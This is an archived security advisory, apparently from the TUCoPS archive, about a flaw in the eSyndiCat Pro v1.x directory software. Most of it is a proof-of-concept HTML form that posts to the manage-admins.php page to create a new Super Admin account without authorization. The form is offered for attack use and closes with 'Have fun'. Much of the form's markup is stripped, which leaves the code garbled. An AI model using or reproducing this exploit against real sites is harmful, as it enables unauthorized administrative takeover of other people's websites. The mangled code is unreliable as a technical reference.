TUCoPS :: HP Unsorted E

TUCoPS :: HP Unsorted E :: tb10957.htm
eSyndiCat Input Validation Error Vulnerability

eSyndiCat Input Validation Error Vulnerability eSyndiCat Input Validation Error Vulnerability


eSyndiCat is Directory websystem, a product of eSyndiCat.com
It has security hole allow attackers get admin and more and more.
Infected version: eSyndiCat Pro v1.x
Infected file: manage-admins.php
Use poc file to attack:

------------------------------------------------
Discovered by H2P - A member of http://vnbrain.net 
action="http://target/path/admin/manage-admins.php?action=add" method="post"> 

	=09
	
=09


	Admin username:
	


	Admin Fullname:
	


	Admin Email:
	
value="hack2prison@freeprotect.net" /> 


	Admin password:
	


	Admin Password Confirmation:
	


	Admin Status:
		


	Submission Notification:
		Enabled
		Disabled
	


	Payment Notification: Enabled
		Disabled
	

	Admin Permissions


	Super Admin:
			Enabled
		Disabled
	





	
		
		
	



------------------------------------------------

Have fun

Admin username:
Admin Fullname:
Admin Email:	value="hack2prison@freeprotect.net" />
Admin password:
Admin Password Confirmation:
Admin Status:
Submission Notification:	Enabled Disabled
Payment Notification:	Enabled Disabled
Admin Permissions
Super Admin:	Enabled Disabled